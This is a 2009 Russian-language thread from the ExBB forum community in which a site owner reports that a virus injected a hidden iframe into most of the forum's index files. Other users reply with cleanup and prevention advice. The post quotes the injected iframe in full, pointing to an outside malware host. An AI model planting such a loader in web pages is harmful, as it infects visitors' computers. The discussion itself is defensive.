Форум атакован вирусом типа HTML:Iframe-inf

ExBB Community » Файловый ExBB » Решение проблем » Уязвимости

Страниц (1): [1]

Без описания

Поиск в теме | Версия для печати

i-text	Отправлено: 21 августа 2009 — 12:05
Newbie Покинул форум Сообщений всего: 17 Дата рег-ции: Июль 2009 Откуда: Москва Репутация: 1	Сегодня утром захожу на свой форум... И вижу белое окно браузера. В недоумении заглядываю на фтп и слышу голос аваста: "Внимание обнаружен вирус!". Смотрю на список файлов и действительно файл "index.php" недавно был модифицирован, открываю его в редакторе и вижу последняя часть его кода варварски удалена (с 281 по 296 строку), а за место нее стоит ненавистный iframe тег, такого типа: CODE: iframe src="http://f5l.at:8080/ts/in.cgi?pepsi154" width=125 height=125 style="visibility: hidden"></iframe> . Удалил. А потом обнаружил, что это содержание внедрено практически во все "индекс" файлы форума. Пришлось чистить. Кто может подсказать как бороться с такими атаками? Как их предотвратить? И как они вообще возможны? Как был получен доступ на запись к индекс файлам? (Отредактировано автором: 21 августа 2009 — 12:06)

ExBB FAQ ExBB 1.1 тестовая версия ExBB 2.0.*

RomAndry	Отправлено: 21 августа 2009 — 12:20
Newbie Покинул форум Сообщений всего: 33 Дата рег-ции: Июнь 2009 Откуда: Ukraine Репутация: 6	1. не читать подозрительные письма! 2. не ходить по подозрительным ссылкам! 3. почистить комп от вирусов 4. почистить измененные файлы (смотреть по дате модификации) 5. сменить пароли на ФТП и Базу 6. стараться не использовать total Comander 7. повторять пункт 1 и 2 до просветвления

i-text	Отправлено: 21 августа 2009 — 13:30
Newbie Покинул форум Сообщений всего: 17 Дата рег-ции: Июль 2009 Откуда: Москва Репутация: 1	RomAndry Спасибо. Но я это все проделал. Мне стал интересен механизм доступа к файлам на фтп. Какими путями это делается? Т.е. как я понял, после проникновения на компьютер, вирус ворует пароли из фтп клиента (у меня файлзилла) и ... что происходит дальше? Он куда-то отсылает полученные данные?

Borman	Отправлено: 21 августа 2009 — 14:23
Full Member Покинул форум Сообщений всего: 182 Дата рег-ции: Февр. 2009 Откуда: Украина, Донецк Репутация: 3	RomAndry +1 И желательно иметь файрвол типа OutPost и хорошенько его настроить, или антивирь типа Esset Smart Security с файрволом. И ребята мой вам совет не шартесь по порно сайтам, это рассадник вирусов и троянов, убедился на собственном опыте. После их посещения Каспер не успевал ДОС-атаки отбивать.

Victor	Отправлено: 21 августа 2009 — 19:15
Full Member Покинул форум Сообщений всего: 237 Дата рег-ции: Март 2009 Репутация: 14	RomAndry +1 вирус атаковал фтп через ТоталКомандер (он имеет такую уязвимость)..одно хорошо заразив файлы он больше не возвращается на тот же ресурс... чистить комп от вирусов и обновлять базу антивира.. в общем то тотал после этого меня не подводил.. крайний вариант тех.поддержка хостинга тоже может помочь...

RomAndry	Отправлено: 21 августа 2009 — 19:57
Newbie Покинул форум Сообщений всего: 33 Дата рег-ции: Июнь 2009 Откуда: Ukraine Репутация: 6	i-text пишет: Т.е. как я понял, после проникновения на компьютер, вирус ворует пароли из фтп клиента (у меня файлзилла) и ... что происходит дальше? Он куда-то отсылает полученные данные? да, различные модификации есть этого вида трояна, в кратце скажу так заходят на аккаунты, которые были на ФТП, модифицируют файлы, далее посетители заходят на страничку с вирусом и заражаются и точно так же далее происходит по принципу цепной реакции. Есть модификации, которые потом используют зараженные компьютеры для DDOS атак

Поиск в теме | Версия для печати

Страниц (1): [1]

Сейчас эту тему просматривают: 1 (гостей: 1, зарегистрированных: 0)

« Уязвимости »

	Темы	Форум	Информация о теме	Обновление
Похожие темы: Форум атакован вирусом типа HTML:Iframe-inf
	Какие файлы и папки сохранить для переноса? Форум заспамили... Надеюсь на переустановку...	Установка и обновление	Ответов: 31 Автор темы: DreaMinder	31 января 2010 — 14:01 Автор: DreaMinder
	Запрет на копирование содержимого Запрет на копирование HTML содержимого и фотографий	Обсуждаем	Ответов: 31 Автор темы: msnavigator	24 апреля 2011 — 17:59 Автор: valet92
	Проблема при просмотре форума Гуглом public_html/forum/index.php on line 293	Решение проблем	Ответов: 2 Автор темы: Sasa1	21 декабря 2010 — 15:14 Автор: Sasa1
	Добавляется точка с запятой (;) в конце текста и лишний пробел если НЕ включить HTML теги в тексте сообщения	Решение проблем	Ответов: 5 Автор темы: shyuser	21 июля 2009 — 22:15 Автор: yura3d
	Зависание перехода на форум При переходе по ссылке Форум страница не загружается	Решение проблем	Ответов: 18 Автор темы: Павел Пушков	13 января 2018 — 14:54 Автор: Павел Пушков

Все гости форума могут просматривать этот раздел.
Только администраторы и модераторы могут создавать новые темы в этом разделе.
Только администраторы и модераторы могут отвечать на сообщения в этом разделе.

[Script Execution time: 0.0718] [ ]